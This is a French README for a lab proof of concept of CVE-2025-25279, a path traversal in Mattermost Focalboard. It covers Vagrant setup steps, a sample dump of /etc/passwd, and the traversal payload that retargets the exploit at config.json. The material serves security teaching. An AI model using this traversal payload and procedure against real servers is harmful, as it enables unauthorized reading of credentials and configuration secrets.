
Preuve de concept d'exploitation pour CVE-2025-25279, une traversée de chemin dans Mattermost Focalboard permettant une lecture arbitraire de fichiers authentifiée et l'exfiltration de fichiers sensibles.
Cette preuve de concept démontre l’exploitation de la vulnérabilité CVE-2025-25279 affectant Mattermost 10.4.1.
Une faille dans Focalboard (le module de gestion de tableaux) permet une lecture arbitraire de fichiers via un path traversal dans les attachments.
L’exploit permet d’exfiltrer :
/etc/passwd/etc/groupopt/mattermost/config/config.jsonL’attaque fonctionne uniquement avec un compte utilisateur authentifié dans les scénarios vulnérables.
Le dossier target/ n'est pas inclus (trop volumineux pour GitHub).
Télécharger manuellement : https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
D'abord allez dans le repertoire target et faire:
cd target
make mattermost.box
Assurez vous d'avoir la box mattermost-poc sinon la VM ne marche pas:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Se connecter à la VM
vagrant ssh
ouvrir: http://localhost:8065
Profil --> Security --> Personal Access Tokens
Depuis la machine hôte :
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
On vous demandera :
PAT (Personal Access Token) :
👉 Entrez un PAT valide d’un utilisateur Mattermost.
📸 Exemple de sortie (exfiltration de /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
Fichier ciblé : config.json
Pour viser un fichier Mattermost sensible :
Modifier en haut du script exploit.sh :
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Démonstration vidéo
👉 Une démonstration complète en vidéo se trouve dans : live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 Notes
Ce PoC est strictement destiné aux environnements d'apprentissage. Ne jamais utiliser hors cadre pédagogique ou sans autorisation.